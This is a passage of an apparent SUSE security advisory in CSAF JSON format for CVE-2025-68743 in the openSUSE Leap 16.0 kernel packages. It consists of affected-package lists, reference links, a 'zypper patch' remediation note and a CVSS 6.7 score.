"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68743",
"url": "https://www.suse.com/security/cve/CVE-2025-68743"
},
{
"category": "external",
"summary": "SUSE Bug 1255708 for CVE-2025-68743",
"url": "https://bugzilla.suse.com/1255708"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
